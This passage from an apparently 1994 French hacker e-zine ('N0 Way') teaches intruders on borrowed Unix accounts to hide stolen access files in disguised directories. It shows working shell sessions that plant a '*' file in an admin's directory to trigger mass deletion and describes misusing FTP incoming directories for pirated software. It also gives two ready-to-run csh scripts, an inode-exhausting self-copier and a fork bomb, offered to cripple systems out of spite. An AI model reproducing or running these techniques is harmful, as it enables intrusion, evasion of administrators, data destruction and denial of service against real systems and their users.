  1141.   Ce qu'il faut faire devient plus clair:
  1142.   Trouvez un endroit ou mettre notre bloc, par exemple la fin du
  1143.  fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est
  1144.  marqué par un ';' ). Il suffit d'y inserer un '!', le code disant
  1145.  que ceci est une Application Extension (0xFF), le numero 11, puis
  1146.  votre ID specifique (Sur Compu$serve en forum PICS il y a une liste
  1147.  rassemblent tous le Application ID deja utilisés, liste geré par
  1148.  Larry Wood).  Puis vous mettez votre code de 3 bytes, sorte de
  1149.  signature pour verifier que ce n'est pas un faux bloc, puis
  1150.  finalement vous balancez votre file, sans trop vous soucier de la
  1151.  compression (qui selon la doc doit etre RLE), car de toute façon il
  1152.  sera decodé par un soft maison, et pas par le viewer de GIF.
  1153.  Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la
  1154.  fin du bloc.  Voila, une methode discrete et aisé.  Merci
  1155.  Compu$serve.
  1156.  
  1157.  2) Finalement...
  1158.  Au fait, j'ai traité certaines methodes, et j'espere que vous
  1159.  pensez deja a d'autres (elles sont illimités).  Mais, je n'ais pas
  1160.  parlé de celle mentionné dans l'intro, du Crypted text dans du
  1161.  graphic.  Ben, heu, a vous de la faire :-)  Serieusement j'etudie la
  1162.  question, et j'ai vu certains programmes sur BBS qui pretendait
  1163.  faire exactement cela.  Peut-etre un article ulterieure (enfin,
  1164.  j'ai dit peut-etre)...
  1165.  
  1166.  X) Bon, ben la le file est fini.  J'espere que vous avez apprecié,
  1167.  car ce fut interessant a ecrire.  En cas ou vous auriez deja
  1168.  oublié, me llamo Arscene, et je prends data/info/mail/insultes/louanges/
  1169.  demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur
  1170.  The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma clé:
  1171.  
  1172. -----BEGIN PGP PUBLIC KEY BLOCK-----
  1173. Version: 2.3a
  1174.  
  1175. mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL
  1176. gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u
  1177. /PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR
  1178. tAdBcnNjZW5l
  1179. =IosC
  1180. -----END PGP PUBLIC KEY BLOCK-----
  1181.  Contactez moi en BAL avant de m'envoyer quelque chose de
  1182. confidentiel pour verifier que vous avez bien ma VRAIE clé.
  1183. ---------------------------------------------------------------------
  1184.  
  1185.                                -%!% N0 Way %!%-
  1186.  
  1187.                       Volume I,   Numéro 3,  Partie 3.7
  1188.  
  1189.  
  1190.                                  w____OO____w
  1191.  
  1192.                       Playing hide 'n' seek in CyberSpace
  1193.  
  1194.                                 by ++NeurAlien
  1195.  
  1196.                                    /\/OO\/\
  1197.  
  1198.         Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis
  1199. "Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !"
  1200. (ce qui veut dire Mr Allg00d :
  1201. "ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha )
  1202.  
  1203.         Alors, voila, je vais vous montrer comment jouer au gros chien avec son
  1204. admin de systeme Unix en lui cachant des trucs n'importe ou.  Ceci est
  1205. utilisable sans programme spéciaux ni quoi: vous avez juste a connaitre la
  1206. métthode.  Et ensuite je vais vous montrer comment vous amuser enormement avec
  1207. les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des
  1208. Incomings directories.
  1209.  
  1210.         Ce N-Phile est dedicace tout specialement à Arscene qui s'applique
  1211. toujours à nous fournir des articles qui relevent le niveau de N0 Way...
  1212. (Ca va plaire, la distribution de NW 3 est assurée à grande échelle cette fois
  1213. ci ! :))
  1214.         Je tiens a remercier aussi les quelques personnes qui m'ont enseignées
  1215. l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je
  1216. n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la
  1217. rue pour m'avoir souvent permis de me défouler, les "experts en sécurité" pour
  1218. m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent
  1219. dépanné ;))
  1220.  
  1221. Ou est ce que je me planque en local?
  1222. ====================================
  1223.         Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et
  1224. systemes, hum, yen a pas trop.  Par contre unix a un gros avantage:
  1225. il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier.
  1226. Par exemple, il accepte les espaces dans ses noms de fichier.
  1227. Ainsi on peut facilement dissimuler créer des fichier qui seront difficilement
  1228. accessibles.
  1229.  
  1230. On peut créer un fichier "sale admin" par exemple mais bon, ca se remarque !
  1231. Exemple 1:
  1232. ======> Script started on Thu Sep 15 02:16:15 1994
  1233. DaubeNet-tmp {101} ls -al
  1234. total 2
  1235. drwx------   2 fred  emprunte  512 Sep 15 02:16 .
  1236. drwx------  11 fred  emprunte  512 Sep 15 02:16 ..
  1237. -rw-------   1 fred  emprunte    0 Sep 15 02:16 ex1
  1238. DaubeNet-tmp {102} cat >"sale admin"
  1239. Haha, gros nain, tu sais meme pas effacer un fichier pfff....
  1240. ^D
  1241. DaubeNet-tmp {103} exit
  1242. ======> Script done on Thu Sep 15 02:17:36 1994
  1243.  
  1244. Alors la, l'admin quand il se pointe il voie:
  1245. ======> Script started on Thu Sep 15 02:19:04 1994
  1246. DaubeNet-tmp {101} ls -al
  1247. total 3
  1248. drwx------   2 fred  emprunte  512 Sep 15 02:17 .
  1249. drwx------  12 fred  emprunte  512 Sep 15 02:17 ..
  1250. -rw-------   1 fred  emprunte   62 Sep 15 02:17 sale admin
  1251. DaubeNet-tmp {102} exit
  1252. ======> Script done on Thu Sep 15 02:19:18 1994
  1253.  
  1254. Ehehe, voila... Et la l'admin il aura beau tenter:
  1255. ======> Script started on Thu Sep 15 02:19:22 1994
  1256. root# ls -al
  1257. total 3
  1258. drwx------   2 fred  emprunte  512 Sep 15 02:17 .
  1259. drwx------  12 fred  emprunte  512 Sep 15 02:17 ..
  1260. -rw-------   1 fred  emprunte   62 Sep 15 02:17 sale admin
  1261. root# rm sale admin
  1262. rm: sale: No such file or directory.
  1263. rm: admin: No such file or directory.
  1264. root# echo ARghhhhhh
  1265. ARghhhhhh
  1266. root# exit
  1267. ======> Script done on Thu Sep 15 02:19:45 1994
  1268.  
  1269. Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est:
  1270. ======> Script started on Thu Sep 15 02:20:57 1994
  1271. DaubeNet-tmp {101} ls -al
  1272. total 3
  1273. drwx------   2 fred  emprunte  512 Sep 15 02:17 .
  1274. drwx------  12 fred  emprunte  512 Sep 15 02:17 ..
  1275. -rw-------   1 fred  emprunte   62 Sep 15 02:17 sale admin
  1276. DaubeNet-tmp {102} rm "sale admin"
  1277. DaubeNet-tmp {103} ls -al
  1278. total 2
  1279. drwx------   2 fred  emprunte  512 Sep 15 02:21 .
  1280. drwx------  12 fred  emprunte  512 Sep 15 02:17 ..
  1281. DaubeNet-tmp {104} exit
  1282. ======> Script done on Thu Sep 15 02:21:11 1994
  1283.  
  1284.  
  1285. Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez
  1286. reellement planquer des trucs, il faut la jouer plus fine.  Si par exemple
  1287. root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez
  1288. le login de quelqu'un, vous pouvez les cacher tres simplement.
  1289. Exemple 2:
  1290.  
  1291. ======> Script started on Thu Sep 15 02:25:11 1994
  1292.  
  1293. DaubeNet-fred {101} ls -al
  1294. total 46
  1295. drwx------  12 fred  emprunte   512 Sep 15 02:24 .
  1296. drwxrwxr-x   5 root  wheel      512 Sep  9 12:03 ..
  1297. -rwx------   1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1298. -rwx------   1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1299. -rwx------   1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1300. drwx------   2 fred  emprunte   512 Jun 12 22:31 .elm
  1301. -rw-------   1 fred  emprunte  2229 Jul  4 17:45 .history
  1302. -rwx------   1 fred  emprunte   207 Sep  3  1993 .login
  1303. -rwx------   1 fred  emprunte   105 Sep  3  1993 .mailrc
  1304. -rwx------   1 fred  emprunte    83 Sep  3  1993 .profile
  1305. -rwx------   1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1306. -rwx------   1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1307. drwx------   2 fred  emprunte   512 Jun 12 22:31 Mail
  1308. -rw-------   1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1309. -rw-------   1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1310. drwx------   7 fred  emprunte   512 Jun 20 01:40 src
  1311. drwx------   2 fred  emprunte   512 Sep 15 02:21 tmp
  1312. drwx------   5 fred  emprunte   512 Jul  4 14:45 tools
  1313. [voici nos fichiers]
  1314. DaubeNet-fred {102} ll milnet.dialup root.axs
  1315. 1 -rw-------  1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1316. 2 -rw-------  1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1317. [On crée le directory fantome]
  1318. DaubeNet-fred {103} mkdir ".. "
  1319. [On met nos fichiers dedans]
  1320. DaubeNet-fred {104} mv milnet.dialup root.axs ".. "
  1321. [OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!]
  1322. DaubeNet-fred {105} ls -al
  1323. total 44
  1324. drwx------  13 fred  emprunte   512 Sep 15 02:25 .
  1325. drwxrwxr-x   5 root  wheel      512 Sep  9 12:03 ..
  1326. drwx------   2 fred  emprunte   512 Sep 15 02:25 ..
  1327. -rwx------   1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1328. -rwx------   1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1329. -rwx------   1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1330. drwx------   2 fred  emprunte   512 Jun 12 22:31 .elm
  1331. -rw-------   1 fred  emprunte  2229 Jul  4 17:45 .history
  1332. -rwx------   1 fred  emprunte   207 Sep  3  1993 .login
  1333. -rwx------   1 fred  emprunte   105 Sep  3  1993 .mailrc
  1334. -rwx------   1 fred  emprunte    83 Sep  3  1993 .profile
  1335. -rwx------   1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1336. -rwx------   1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1337. drwx------   2 fred  emprunte   512 Jun 12 22:31 Mail
  1338. drwx------   7 fred  emprunte   512 Jun 20 01:40 src
  1339. drwx------   2 fred  emprunte   512 Sep 15 02:21 tmp
  1340. drwx------   5 fred  emprunte   512 Jul  4 14:45 tools
  1341. DaubeNet-fred {106} cd ".. "
  1342. DaubeNet-fred {107} ls -al
  1343. total 5
  1344. drwx------   2 fred  emprunte   512 Sep 15 02:25 .
  1345. drwx------  13 fred  emprunte   512 Sep 15 02:25 ..
  1346. -rw-------   1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1347. -rw-------   1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1348. DaubeNet-fred {108} cd ..
  1349. DaubeNet-fred {109} mv ".. \milnet.dialup" .
  1350. DaubeNet-fred {110} ls -al
  1351. total 45
  1352. drwx------  13 fred  emprunte   512 Sep 15 02:26 .
  1353. drwxrwxr-x   5 root  wheel      512 Sep  9 12:03 ..
  1354. drwx------   2 fred  emprunte   512 Sep 15 02:26 ..
  1355. -rwx------   1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1356. -rwx------   1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1357. -rwx------   1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1358. drwx------   2 fred  emprunte   512 Jun 12 22:31 .elm
  1359. -rw-------   1 fred  emprunte  2229 Jul  4 17:45 .history
  1360. -rwx------   1 fred  emprunte   207 Sep  3  1993 .login
  1361. -rwx------   1 fred  emprunte   105 Sep  3  1993 .mailrc
  1362. -rwx------   1 fred  emprunte    83 Sep  3  1993 .profile
  1363. -rwx------   1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1364. -rwx------   1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1365. drwx------   2 fred  emprunte   512 Jun 12 22:31 Mail
  1366. -rw-------   1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1367. drwx------   7 fred  emprunte   512 Jun 20 01:40 src
  1368. drwx------   2 fred  emprunte   512 Sep 15 02:21 tmp
  1369. drwx------   5 fred  emprunte   512 Jul  4 14:45 tools
  1370. DaubeNet-fred {111} mv ".. /milnet.dialup" .
  1371. DaubeNet-fred {112} ls -al
  1372. total 47
  1373. drwx------  13 fred  emprunte   512 Sep 15 02:26 .
  1374. drwxrwxr-x   5 root  wheel      512 Sep  9 12:03 ..
  1375. drwx------   2 fred  emprunte   512 Sep 15 02:26 ..
  1376. -rwx------   1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1377. -rwx------   1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1378. -rwx------   1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1379. drwx------   2 fred  emprunte   512 Jun 12 22:31 .elm
  1380. -rw-------   1 fred  emprunte  2229 Jul  4 17:45 .history
  1381. -rwx------   1 fred  emprunte   207 Sep  3  1993 .login
  1382. -rwx------   1 fred  emprunte   105 Sep  3  1993 .mailrc
  1383. -rwx------   1 fred  emprunte    83 Sep  3  1993 .profile
  1384. -rwx------   1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1385. -rwx------   1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1386. drwx------   2 fred  emprunte   512 Jun 12 22:31 Mail
  1387. -rw-------   1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1388. -rw-------   1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1389. drwx------   7 fred  emprunte   512 Jun 20 01:40 src
  1390. drwx------   2 fred  emprunte   512 Sep 15 02:21 tmp
  1391. drwx------   5 fred  emprunte   512 Jul  4 14:45 tools
  1392. [Alors pour pas faire trop louche, on va creer un directory pour un utilitaire
  1393.  bien obscure et qui semble utile à l'admin. Pour le trouver, reflechissez un
  1394.  peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;]
  1395. DaubeNet-fred {113} mkdir ".Xnewsrc "
  1396. DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc "
  1397. DaubeNet-fred {115} cd ".Xnewsrc "
  1398. DaubeNet-fred {116} ls
  1399. milnet.dialup    root.axs
  1400. DaubeNet-fred {117} ll
  1401. total 3
  1402. 1 -rw-------  1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1403. 2 -rw-------  1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1404. DaubeNet-fred {118} ls -al
  1405. total 5
  1406. drwx------   2 fred  emprunte   512 Sep 15 02:27 .
  1407. drwx------  14 fred  emprunte   512 Sep 15 02:27 ..
  1408. -rw-------   1 fred  emprunte   260 Sep 15 02:24 milnet.dialup
  1409. -rw-------   1 fred  emprunte  1040 Sep 15 02:24 root.axs
  1410. DaubeNet-fred {119} cd ..
  1411. DaubeNet-fred {120} ll
  1412. total 43
  1413.  1 drwx------  2 fred  emprunte   512 Sep 15 02:26 ..
  1414.  1 -rwx------  1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1415.  1 drwx------  2 fred  emprunte   512 Sep 15 02:27 .Xnewsrc
  1416.  9 -rwx------  1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1417.  1 -rwx------  1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1418.  1 drwx------  2 fred  emprunte   512 Jun 12 22:31 .elm
  1419.  3 -rw-------  1 fred  emprunte  2229 Jul  4 17:45 .history
  1420.  1 -rwx------  1 fred  emprunte   207 Sep  3  1993 .login
  1421.  1 -rwx------  1 fred  emprunte   105 Sep  3  1993 .mailrc
  1422.  1 -rwx------  1 fred  emprunte    83 Sep  3  1993 .profile
  1423.  8 -rwx------  1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1424.  1 -rwx------  1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1425.  1 drwx------  2 fred  emprunte   512 Jun 12 22:31 Mail
  1426.  1 drwx------  7 fred  emprunte   512 Jun 20 01:40 src
  1427.  1 drwx------  2 fred  emprunte   512 Sep 15 02:21 tmp
  1428.  1 drwx------  5 fred  emprunte   512 Jul  4 14:45 tools
  1429. [ c'est discret et ca apparait pas sans l'option "-a" de "ls"]
  1430. DaubeNet-fred {121} ls -l
  1431. total 12
  1432. drwx------  2 fred  emprunte   512 Jun 12 22:31 Mail
  1433. drwx------  7 fred  emprunte   512 Jun 20 01:40 src
  1434. drwx------  2 fred  emprunte   512 Sep 15 02:21 tmp
  1435. drwx------  5 fred  emprunte   512 Jul  4 14:45 tools
  1436. DaubeNet-fred {122} rm -fr ".Xnewsrc "
  1437. DaubeNet-fred {123} ls -al
  1438. total 44
  1439. drwx------  13 fred  emprunte   512 Sep 15 02:27 .
  1440. drwxrwxr-x   5 root  wheel      512 Sep  9 12:03 ..
  1441. drwx------   2 fred  emprunte   512 Sep 15 02:26 ..
  1442. -rwx------   1 fred  emprunte   655 Sep  3  1993 .Xmodmaprc
  1443. -rwx------   1 fred  emprunte  8331 Sep  3  1993 .Xresources
  1444. -rwx------   1 fred  emprunte   653 Jul  4 15:21 .cshrc
  1445. drwx------   2 fred  emprunte   512 Jun 12 22:31 .elm
  1446. -rw-------   1 fred  emprunte  2229 Jul  4 17:45 .history
  1447. -rwx------   1 fred  emprunte   207 Sep  3  1993 .login
  1448. -rwx------   1 fred  emprunte   105 Sep  3  1993 .mailrc
  1449. -rwx------   1 fred  emprunte    83 Sep  3  1993 .profile
  1450. -rwx------   1 fred  emprunte  7908 Sep  3  1993 .twmrc
  1451. -rwx------   1 fred  emprunte   866 Sep  3  1993 .xinitrc
  1452. drwx------   2 fred  emprunte   512 Jun 12 22:31 Mail
  1453. drwx------   7 fred  emprunte   512 Jun 20 01:40 src
  1454. drwx------   2 fred  emprunte   512 Sep 15 02:21 tmp
  1455. drwx------   5 fred  emprunte   512 Jul  4 14:45 tools
  1456. DaubeNet-fred {124} exit
  1457.  
  1458. ======> Script done on Thu Sep 15 02:28:05 1994
  1459.  
  1460. Interressant n'est ce pas?
  1461.  
  1462. Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout
  1463. debut de l'affichage, on peut quand meme les cacher la dedans car en général
  1464. les admins sont trop flemmards pour aller fouiller la dedans.
  1465. Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout
  1466. de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins
  1467. évident.
  1468.  
  1469. L'intéret de créer des fichier commencant par "." est qu'ils ne sont pas listés
  1470. à moins qu'on donne l'option "-a" a la commande "ls".
  1471.  
  1472. Vous pouvez aussi inclure des caracteres de controles dans le nom de vos
  1473. fichier comme ^X ou ^T mais je déconseille car ca attire plutot l'attention.
  1474.  
  1475. Comment je planque mes images?
  1476. =============================
  1477.  
  1478.         Dans certaines ecoles, il y a des règles pas si conne que ca qui
  1479. interdisent les images sur leur réseau et donc des moulinettes tournent tous
  1480. les jours pour traquer les .gif, .jpg etc...
  1481.  
  1482. Pour eviter de vous les faire detruire, vous pouvez les cacher dans des
  1483. fichiers TAR.
  1484. exemple:
  1485. ======> Script started on Thu Sep 15 02:49:50 1994
  1486.  
  1487. DaubeNet-tmp {101} ls -al
  1488. total 778
  1489. drwx------   2 fred  emprunte     512 Sep 15 02:49 .
  1490. drwx------  13 fred  emprunte     512 Sep 15 02:27 ..
  1491. -rw-------   1 fred  emprunte  557056 Sep 15 02:49 hardfuck.gif
  1492. -rw-------   1 fred  emprunte  221184 Sep 15 02:48 susan.gif
  1493. DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif
  1494. hardfuck.gif
  1495. susan.gif
  1496. tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written.
  1497. DaubeNet-tmp {103} ll
  1498. total 1560
  1499.  552 -rw-------  1 fred  emprunte  557056 Sep 15 02:49 hardfuck.gif
  1500.  784 -rw-------  1 fred  emprunte  788480 Sep 15 02:50 projet-math.tar
  1501.  224 -rw-------  1 fred  emprunte  221184 Sep 15 02:48 susan.gif
  1502. DaubeNet-tmp {106} rm hardfuck.gif
  1503. DaubeNet-tmp {107} rm susan.gif
  1504. DaubeNet-tmp {108} ll
  1505. total 784
  1506.  784 -rw-------  1 fred  emprunte  788480 Sep 15 02:50 projet-math.tar
  1507. DaubeNet-tmp {109} compress projet-math.tar
  1508. DaubeNet-tmp {110} ll
  1509. total 5
  1510.  5 -rw-------  1 fred  emprunte  4169 Sep 15 02:50 projet-math.tar.Z
  1511. DaubeNet-tmp {111} exit
  1512.  
  1513. ======> Script done on Thu Sep 15 02:51:17 1994
  1514.  
  1515. Si le programme de l'admin est assez vicieux pour checker l'interieur des
  1516. fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et
  1517. ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout
  1518. le monde (y compris le programme) pensera que c'est un fichier donnée.
  1519.  
  1520. Crypter ses fichiers:
  1521. ====================
  1522.         Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt.
  1523. Attention, si votre Admin n'est pas trop con, il aura un petit outil appelé
  1524. gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code
  1525. de crypt.  Je vous déconseille donc d'utiliser crypt.
  1526. (PS: cbw peut vous être utile, il est disponible en ftp anonymous un peu
  1527. partout sur l'internet sous le nom: cbw.tar.Z).
  1528.  
  1529.         Par contre, un package genial c'est PGP: un produit qui permet
  1530. d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il
  1531. est une combinaison de DES et de RSA.
  1532.  
  1533. C'est vraiment un outil génial qui vaudrait un article de N0 Way a lui tout
  1534. seul.
  1535.  
  1536. Faire criser son admin:
  1537. ======================
  1538.         Vous savez certainnement que sous Unix, certains caracteres sont
  1539. interpretés par le Shell avant d'executer la commande dans laquelle était le
  1540. fameux caractere.
  1541. Ce caractere c'est par exemple "*" qui va être remplacé par les noms de tous
  1542. les fichiers du directory en question.
  1543. Amusez vous a créer dans un directory hyper important de votre admin un fichier
  1544. nommé "*".
  1545.  
  1546. Exemple:
  1547.  
  1548. ======> Script started on Thu Sep 15 03:11:09 1994
  1549.  
  1550. DaubeNet-/home/root {101} ls -al
  1551. total 778
  1552. drwxrwxrwx   2 root  wheel        512 Sep 15 03:11 .
  1553. drwxr-xr-x  13 root  wheel        512 Sep 15 02:27 ..
  1554. -rw-r-xr-x   1 root  wheel     557056 Sep 15 02:49 important.txt
  1555. -rw-r-xr-x   1 root  wheel     221184 Sep 15 02:48 whole-sources.c
  1556. DaubeNet-/home/root {102} cat >\*
  1557. ^D
  1558. DaubeNet-/home/root {103} ll
  1559. total 776
  1560.    0 -rw-r-xr-x  1 fred  emprunte       0 Sep 15 03:11 *
  1561.  552 -rw-r-xr-x  1 root  wheel     557056 Sep 15 02:49 important.txt
  1562.  224 -rw-r-xr-x  1 root  wheel     221184 Sep 15 02:48 whole-sources.c
  1563. DaubeNet-/home/root {104} exit
  1564.  
  1565. ======> Script done on Thu Sep 15 03:11:40 1994
  1566.  
  1567. L'admin (assez con pour laisser son directory en lecture / ecriture) a une
  1568. jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera.
  1569.  
  1570. ======> Script started on Thu Sep 15 03:18:54 1994
  1571.  
  1572. DaubeNet-/home/root {101} ls -al
  1573. total 778
  1574. -rw-r-xr-x   1 fred  emprunte       0 Sep 15 03:11 *
  1575. drwxrwxrwx   2 root  wheel        512 Sep 15 03:11 .
  1576. drwxr-xr-x  13 root  wheel        512 Sep 15 02:27 ..
  1577. -rw-------   1 root  wheel     557056 Sep 15 02:49 important.txt
  1578. -rw-------   1 root  wheel     221184 Sep 15 02:48 whole-sources.c
  1579. DaubeNet-/home/root {102} rm *
  1580. DaubeNet-/home/root {103} ll
  1581. DaubeNet-/home/root {104} ls -al
  1582. total 2
  1583. drwxrwxrwx   2 root  wheel     512 Sep 15 03:19 .
  1584. drwxr-xr-x  13 root  wheel     512 Sep 15 02:27 ..
  1585. DaubeNet-/home/root {105} echo Arghhhhh
  1586. Arghhhhh
  1587. DaubeNet-/home/root {106} exit
  1588.  
  1589. ======> Script done on Thu Sep 15 03:19:21 1994
  1590.  
  1591. VOila, c'est fini pour la partie locale...
  1592. Maintenant, je vais vous expliquer comment vous servir des répertoires
  1593. incomings et autres pour vous transferer des fichier.
  1594.  
  1595. Le FTP anonyme:
  1596. ==============
  1597. Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de
  1598. déposer des fichiers pour l'admin.
  1599. Un site bien configuré aura mis comme mode pour ce dir: rwxrwxr-t qui veut
  1600. dire:   rwx : lecture/ecriture/traversee possible pour l'owner
  1601.         rwx : meme chose                          pour le groupe
  1602.         -wt : acces en ecriture avec traversée du directory possible mais sans
  1603.               possibilité d'effacer le fichier d'un autre.
  1604.  
  1605. Un site mal configuré aura pour mode: rwxrwxrwx qui veut dire:
  1606. lecture, ecriture et traversée pour tout le monde.
  1607. Donc vous pourrez vous créer par un
  1608. ftp> mkdir "..   "
  1609. un fichier secret et ensuite déposer les dernieres versions d'Excel ou le
  1610. dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les
  1611. effacer!
  1612.  
  1613. Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement
  1614. des trucs sur Internet.
  1615.  
  1616. I-node muncher:
  1617. ==============
  1618.         Un admin vous a vraiment fait une crasse?  Vous êtes vert et vous
  1619. voulez un peu le faire chier...
  1620. un "rm -fr /" ? C'est vraiment con car ca peut causer de sales problèmes à des
  1621. personnes qui n'ont rien fait.
  1622. Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses
  1623. Inodes.  Un inode c'est le numéro qui désigne un fichier dans le filesystem
  1624. unix donc si vous les prenez tous, personne ne pourra plus creer de fichier
  1625. même si il reste plein de place sur le disque.
  1626. Alors voila le shell script nw.sh:
  1627. $ cat >nw.sh <<EOF
  1628. #!/bin/csh
  1629. umask 000
  1630. mkdir N0way
  1631. cp nw.sh N0way
  1632. cd N0way
  1633. chmod +x nw.sh
  1634. ./nw.sh &
  1635. EOF
  1636. $
  1637.  
  1638. Executez ce fichier et *kaboummm* le système va commencer à sérieusement merder
  1639. hehehehehe...
  1640. Vous pouvez même en lancer plusieurs.
  1641.  
  1642. Task muncher:
  1643. ============
  1644.         Vous pouvez faire la même chose avec les processus si les quotas ne
  1645. tournent pas.  En faisant tourner un seul process qui a chaque fois forke 5
  1646. fois et vous verrez que plus la machine va vite, plus votre programme investira
  1647. rapidement l'ordinateur en question.
  1648. $ cat >dontkill.sh <<EOF
  1649. #!/bin/csh
  1650. ./dontkill.sh &
  1651. ./dontkill.sh &
  1652. ./dontkill.sh &
  1653. ./dontkill.sh &
  1654. ./dontkill.sh &
  1655. EOF
  1656. $
  1657.  
  1658. Voila, c'est le fion. Euh... la fin.
  1659. J'espere que ce ++N-Phile vous aura été bien utile et occupera longtemps votre
  1660. admin.  N'oubliez pas une chose,
  1661. IL EXISTE QUAND MEME DES ADMINS COOLS ALORS, laissez ceux la tranquile. :))
  1662.  
  1663. The End.
  1664.  
  1665.  
  1666.  
  1667.  
  1668.  
  1669. C'est fini.... y a rien en dessous...
  1670.  
  1671.  
  1672.  
  1673.  
  1674. STOP !!!! YA PLUS RIEN.
  1675. <EOF>
  1676.  
  1677.  
  1678. Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI!
  1679. :)
  1680.  
  1681.  
  1682.                                -%!% N0 Way %!%-
  1683.  
  1684.                       Volume I,   Numéro 3,  Partie 3.8
  1685.  
  1686.  
  1687. Voila, Neuralien m'a presse pour écrire ce petit texte veuillez ne pas tenir
  1688. compte des fotes d'orthographes et autre stupiditées du meme genre.
  1689. [Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe:
  1690. "NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4?
  1691. - Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)"     ++N]
  1692.  
  1693.  
  1694.                              CARTES TELEPHONIQUES
  1695.                                      1/2
  1696.                                   Pour NOWAY
  1697.                                PAR D. O'CONNELL
  1698.  
  1699. Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte à puce
  1700. les applications se sont multipliées. La plus connue étant celle des
  1701. téléphones à cartes, on va donc étudier le mode de fonctionnement de ces
  1702. cartes dans le but évident d'en ameliorer le fonctionnement..
  1703.  
  1704. La realisation technique de la carte tient plus du bricolo que de l'invention
  1705. géniale, le seul (et grand) mérite de Moreno a été d'être un visionaire
  1706. génial.
  1707. On peut résumer le fonctionnement de la carte à une eprom à acces serie donc à
  1708. priori rien de bien compliqué, nostélécartes francaises comportent une simple
  1709. mémoire de 256 bits, oui vous avez bien lu 32 octets!
  1710.  
  1711. La carte est séparée en deux zones la premiere de 96 bits ets dites "Zone
  1712. constructeur" la deuxieme etant la "zone de transaction", jusque là tout le
  1713. mond suit ? pas de probléme?
  1714. Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce
  1715. qui y est écrit sans probleme. La zone transaction peut etre ecrite, mais on
  1716. ne peut écrire que des 0 (technologie des eproms) ce qui revient à débiter des
  1717. unitées, meme Regis c'est rendu compte que c'était pas vraiement interessant.
  1718. La zone constructeur est elle protegée par un fusible qui grille apres la
  1719. premiere programmation, donc on peut plus écrire meme des 0. OK ca va??
  1720.  
  1721. Voila la map memory d'une carte téléphonique:
  1722.  
